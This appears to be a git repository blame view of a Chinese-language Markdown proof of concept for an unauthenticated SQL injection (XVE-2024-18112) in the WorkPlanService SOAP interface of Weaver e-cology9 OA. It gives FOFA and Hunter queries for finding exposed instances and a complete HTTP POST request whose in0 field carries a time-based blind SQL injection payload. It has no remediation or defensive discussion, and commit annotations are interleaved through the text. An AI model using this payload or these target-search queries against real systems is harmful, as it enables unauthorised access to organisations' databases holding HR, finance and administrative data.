admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
POC00/泛微e-cology9接口WorkPlanService前台SQL注入漏洞(XVE-2024-18112).md

40 lines
1.2 KiB
Markdown
Raw Normal View History

727更新漏洞
2024-07-27 12:13:07 +08:00
# 泛微e-cology9接口WorkPlanService前台SQL注入漏洞(XVE-2024-18112)
724更新漏洞
2024-07-24 21:44:16 +08:00
727更新漏洞
2024-07-27 12:13:07 +08:00
泛微e-cology是一款由泛微网络科技开发的协同管理平台支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology9系统WorkPlanService前台存在SQL注入漏洞。
724更新漏洞
2024-07-24 21:44:16 +08:00
727更新漏洞
2024-07-27 12:13:07 +08:00
## fofa
```java
app="泛微-协同商务系统"
```
## hunter
```java
app.name=="泛微 e-cology 9.0 OA"
```
724更新漏洞
2024-07-24 21:44:16 +08:00
## poc
```yaml
POST /services/WorkPlanService HTTP/1.1
727更新漏洞
2024-07-27 12:13:07 +08:00
HOST:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
724更新漏洞
2024-07-24 21:44:16 +08:00
Content-Type: text/xml;charset=UTF-8
Connection: close
727更新漏洞
2024-07-27 12:13:07 +08:00
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:deleteWorkPlan>
<!--type: string-->
<web:in0>(SELECT 8544 FROM (SELECT(SLEEP(5-(IF(27=27,0,5)))))NZeo)</web:in0>
<!--type: int-->
<web:in1>22</web:in1>
</web:deleteWorkPlan>
</soapenv:Body>
724更新漏洞
2024-07-24 21:44:16 +08:00
</soapenv:Envelope>
```
727更新漏洞
2024-07-27 12:13:07 +08:00
![image-20240726172205428](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407261722628.png)
Reference in New Issue Copy Permalink